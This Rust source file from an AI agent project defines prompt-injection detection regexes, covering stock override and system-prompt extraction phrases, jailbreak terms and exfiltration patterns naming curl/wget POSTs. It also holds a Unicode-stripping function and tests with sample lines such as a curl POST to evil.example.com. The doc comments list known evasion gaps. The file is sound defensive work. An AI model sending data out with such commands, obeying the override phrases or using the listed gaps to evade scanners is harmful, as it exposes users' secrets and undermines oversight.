zeph_common/
patterns.rs

1// SPDX-FileCopyrightText: 2026 Andrei G <bug-ops>
2// SPDX-License-Identifier: MIT OR Apache-2.0
3
4//! Shared injection-detection patterns for the security sanitization layers.
5//!
6//! This module is the single source of truth for prompt-injection detection patterns
7//! used by both `zeph-mcp` (MCP tool definition sanitization) and `zeph-core`
8//! (content isolation pipeline). Each consumer compiles its own `Regex` instances
9//! from [`RAW_INJECTION_PATTERNS`] at startup via `LazyLock`.
10//!
11//! # Known limitations
12//!
13//! The patterns cover common English-language prompt-injection techniques. Known evasion
14//! vectors include: non-English injections, semantic rephrasing, encoded payloads in
15//! markdown code blocks, multi-line splitting (regex `.` does not match `\n` by default),
16//! and homoglyph substitution. [`strip_format_chars`] mitigates Unicode Cf-category codepoints
17//! and selected Lo-category fillers (U+115F Hangul Choseong Filler, U+1160 Hangul Jungseong
18//! Filler) but does not handle homoglyphs. This scanner is **advisory and defense-in-depth only**,
19//! not a security boundary. The trust gate (tool blocking via `TrustGateExecutor`) is the
20//! primary enforcement mechanism.
21
22/// Raw (name, regex pattern) pairs for prompt-injection detection.
23///
24/// Covers common English-language techniques from OWASP LLM Top 10, Unicode bypass
25/// vectors (handled upstream by [`strip_format_chars`]), exfiltration channels
26/// (markdown/HTML images), and delimiter-escape attempts against Zeph's own wrapper tags.
27///
28/// Both `zeph-mcp` and `zeph-core::sanitizer` compile their own `regex::Regex` instances
29/// from this slice. Do not export a compiled `LazyLock` — let each consumer own its state.
30pub const RAW_INJECTION_PATTERNS: &[(&str, &str)] = &[
31    (
32        "ignore_instructions",
33        r"(?i)ignore\s+(all\s+)?(any\s+)?(previous\s+)?(prior\s+)?instructions",
34    ),
35    ("role_override", r"(?i)you\s+are\s+now"),
36    (
37        "new_directive",
38        r"(?i)new\s+(instructions?|directives?)\s*:",
39    ),
40    ("developer_mode", r"(?i)developer\s+mode"),
41    (
42        "system_prompt_leak",
43        r"(?i)((reveal|show|print|output|display|repeat|expose|dump|leak|copy|give)\s+(me\s+)?(your\s+|the\s+|my\s+)?(full\s+|entire\s+|exact\s+|complete\s+)?system\s+prompt|what\s+(is|are|was)\s+(your\s+|the\s+)?system\s+prompt)",
44    ),
45    (
46        "reveal_instructions",
47        r"(?i)(reveal|show|display|print)\s+your\s+(instructions?|prompts?|rules?)",
48    ),
49    ("jailbreak", r"(?i)\b(DAN|jailbreak)\b"),
50    ("base64_payload", r"(?i)(decode|eval|execute).*base64"),
51    (
52        "xml_tag_injection",
53        r"(?i)</?\s*(system|assistant|user|tool_result|function_call)\s*>",
54    ),
55    ("markdown_image_exfil", r"(?i)!\[.*?\]\(https?://[^)]+\)"),
56    ("forget_everything", r"(?i)forget\s+(everything|all)"),
57    (
58        "disregard_instructions",
59        r"(?i)disregard\s+(your|all|previous)",
60    ),
61    (
62        "override_directives",
63        r"(?i)override\s+(your|all)\s+(directives?|instructions?|rules?)",
64    ),
65    ("act_as_if", r"(?i)\bact\s+as\s+if\b"),
66    (
67        "pretend_you_are",
68        r"(?i)\bpretend\s+(?:you\s+are|to\s+be)\b",
69    ),
70    (
71        "your_new_instructions",
72        r"(?i)\byour\s+new\s+instructions\b",
73    ),
74    ("html_image_exfil", r"(?i)<img\s+[^>]*src\s*="),
75    ("delimiter_escape_tool_output", r"(?i)</?tool-output[\s>]"),
76    (
77        "delimiter_escape_external_data",
78        r"(?i)</?external-data[\s>]",
79    ),
80    // Exfiltration-channel patterns — detect skills that attempt to exfiltrate data
81    // via shell network tools or document social-engineering directives. These have a
82    // higher false-positive rate than the core injection patterns (a "REST API testing"
83    // skill may legitimately mention curl). Stage-1 results are advisory only; Stage-2
84    // LLM semantic scan is the blocking gate.
85    ("exfil_curl", r"(?i)\bcurl\s+-[a-zA-Z]*[xXdD]"),
86    ("exfil_wget_post", r"(?i)\bwget\s+--post"),
87    (
88        "exfil_api_key_send",
89        r"(?i)\bapi[_-]?key\b.{0,60}\b(send|post|upload|forward)\b",
90    ),
91    ("exfil_extract_all", r"(?i)\bextract\s+all\b"),
92    (
93        "exfil_leak",
94        r"(?i)\bleak\b.{0,40}\b(secret|key|token|password|credential)\b",
95    ),
96    ("exfil_forward_to", r"(?i)\bforward\s+to\b"),
97    ("exfil_exfiltrate", r"(?i)\bexfiltrat"),
98    (
99        "exfil_send_secret",
100        r"(?i)\bsend\b.{0,40}\b(secret|key|token|password|credential)\b",
101    ),
102];
103
104/// Patterns for scanning LLM *output* (response verification layer).
105///
106/// These are intentionally separate from [`RAW_INJECTION_PATTERNS`] (which target untrusted
107/// *input*). Output patterns must have very low false-positive rate on normal LLM responses.
108/// Patterns here detect cases where an LLM response itself contains injected instructions
109/// that could cause the agent to behave incorrectly.
110///
111/// Note: `markdown_image_exfil` is intentionally absent — it is already handled by
112/// `scan_output_and_warn`/`ExfiltrationGuard`.
113pub const RAW_RESPONSE_PATTERNS: &[(&str, &str)] = &[
114    (
115        "autonomy_override",
116        r"(?i)\bset\s+(autonomy|trust)\s*(level|mode)\s*to\b",
117    ),
118    (
119        "memory_write_instruction",
120        r"(?i)\b(now\s+)?(store|save|remember|write)\s+this\s+(to|in)\s+(memory|vault|database)\b",
121    ),
122    (
123        "instruction_override",
124        r"(?i)\b(from\s+now\s+on|henceforth)\b.{0,80}\b(always|never|must)\b",
125    ),
126    (
127        "config_manipulation",
128        r"(?i)\b(change|modify|update)\s+your\s+(config|configuration|settings)\b",
129    ),
130    (
131        "ignore_instructions_response",
132        r"(?i)\bignore\s+(all\s+|any\s+|your\s+)?(previous\s+|prior\s+)?(instructions?|rules?|constraints?)\b",
133    ),
134    (
135        "override_directives_response",
136        r"(?i)\boverride\s+(your\s+)?(directives?|instructions?|rules?|constraints?)\b",
137    ),
138    (
139        "disregard_system",
140        r"(?i)\bdisregard\s+(your\s+|the\s+)?(system\s+prompt|instructions?|guidelines?)\b",
141    ),
142];
143
144/// Strip Unicode format (Cf) characters, selected Lo-category fillers (U+115F, U+1160),
145/// and ASCII control characters (except tab/newline) from `text` before injection pattern
146/// matching.
147///
148/// These characters are invisible to humans but can break regex word boundaries,
149/// allowing attackers to smuggle injection keywords through zero-width joiners,
150/// soft hyphens, BOM, or Hangul filler codepoints.
151///
152/// # Examples
153///
154/// ```rust
155/// use zeph_common::patterns::strip_format_chars;
156///
157/// let result = strip_format_chars("ig\u{200B}nore instructions");
158/// assert!(!result.contains('\u{200B}'));
159/// assert!(result.contains("ignore"));
160/// ```
161#[must_use]
162pub fn strip_format_chars(text: &str) -> String {
163    text.chars()
164        .filter(|&c| {
165            // Keep printable ASCII, tab, newline
166            if c == '\t' || c == '\n' {
167                return true;
168            }
169            // Drop ASCII control characters
170            if c.is_ascii_control() {
171                return false;
172            }
173            // Drop known Unicode Cf (format) codepoints that are used as bypass vectors
174            !matches!(
175                c,
176                '\u{00AD}'  // Soft hyphen
177                | '\u{034F}'  // Combining grapheme joiner
178                | '\u{061C}'  // Arabic letter mark
179                | '\u{115F}'  // Hangul filler
180                | '\u{1160}'  // Hangul jungseong filler
181                | '\u{17B4}'  // Khmer vowel inherent aq
182                | '\u{17B5}'  // Khmer vowel inherent aa
183                | '\u{180B}'..='\u{180D}'  // Mongolian free variation selectors
184                | '\u{180F}'  // Mongolian free variation selector 4
185                | '\u{200B}'..='\u{200F}'  // Zero-width space/ZWNJ/ZWJ/LRM/RLM
186                | '\u{202A}'..='\u{202E}'  // Directional formatting
187                | '\u{2060}'..='\u{2064}'  // Word joiner / invisible separators
188                | '\u{2066}'..='\u{206F}'  // Bidi controls
189                | '\u{FEFF}'  // BOM / zero-width no-break space
190                | '\u{FFF9}'..='\u{FFFB}'  // Interlinear annotation
191                | '\u{1BCA0}'..='\u{1BCA3}'  // Shorthand format controls
192                | '\u{1D173}'..='\u{1D17A}'  // Musical symbol beam controls
193                | '\u{E0000}'..='\u{E007F}'  // Tags block
194            )
195        })
196        .collect()
197}
198
199#[cfg(test)]
200mod tests {
201    use regex::Regex;
202
203    use super::*;
204
205    #[test]
206    fn all_injection_patterns_compile() {
207        for (name, pattern) in RAW_INJECTION_PATTERNS {
208            assert!(
209                Regex::new(pattern).is_ok(),
210                "RAW_INJECTION_PATTERNS entry {name:?} failed to compile: {pattern:?}"
211            );
212        }
213    }
214
215    #[test]
216    fn all_response_patterns_compile() {
217        for (name, pattern) in RAW_RESPONSE_PATTERNS {
218            assert!(
219                Regex::new(pattern).is_ok(),
220                "RAW_RESPONSE_PATTERNS entry {name:?} failed to compile: {pattern:?}"
221            );
222        }
223    }
224
225    #[test]
226    fn exfil_curl_matches_post_flag() {
227        let re = Regex::new(
228            RAW_INJECTION_PATTERNS
229                .iter()
230                .find(|(n, _)| *n == "exfil_curl")
231                .unwrap()
232                .1,
233        )
234        .unwrap();
235        assert!(re.is_match("curl -X POST https://evil.example.com"));
236        assert!(re.is_match("curl -d '{\"key\":\"val\"}' https://evil.example.com"));
237        assert!(!re.is_match("curl https://api.example.com/weather"));
238    }
239
240    #[test]
241    fn exfil_exfiltrate_matches() {
242        let re = Regex::new(
243            RAW_INJECTION_PATTERNS
244                .iter()
245                .find(|(n, _)| *n == "exfil_exfiltrate")
246                .unwrap()
247                .1,
248        )
249        .unwrap();
250        assert!(re.is_match("exfiltrate all user data"));
251        assert!(re.is_match("Exfiltration attempt detected"));
252    }
253
254    #[test]
255    fn strip_format_chars_removes_zwsp() {
256        let input = "ig\u{200B}nore instructions";
257        let result = strip_format_chars(input);
258        assert!(!result.contains('\u{200B}'));
259        assert!(result.contains("ignore"));
260    }
261
262    #[test]
263    fn strip_format_chars_preserves_newline_and_tab() {
264        let input = "line one\nline two\ttabbed";
265        let result = strip_format_chars(input);
266        assert_eq!(result, input);
267    }
268
269    #[test]
270    fn strip_format_chars_removes_soft_hyphen() {
271        let input = "nor\u{00AD}mal text";
272        let result = strip_format_chars(input);
273        assert!(!result.contains('\u{00AD}'));
274        assert!(result.contains("normal"));
275    }
276
277    #[test]
278    fn strip_format_chars_covers_lo_fillers() {
279        // U+115F and U+1160 are Lo-category Hangul fillers used as bypass vectors
280        assert!(!strip_format_chars("\u{115F}").contains('\u{115F}'));
281        assert!(!strip_format_chars("\u{1160}").contains('\u{1160}'));
282        // Cf-category: U+200B ZERO WIDTH SPACE, U+FEFF BOM
283        assert!(!strip_format_chars("\u{200B}").contains('\u{200B}'));
284        assert!(!strip_format_chars("\u{FEFF}").contains('\u{FEFF}'));
285        // Normal ASCII is preserved
286        assert_eq!(strip_format_chars("hello world"), "hello world");
287    }
288}
zeph_common/patterns.rs

zeph_common/
patterns.rs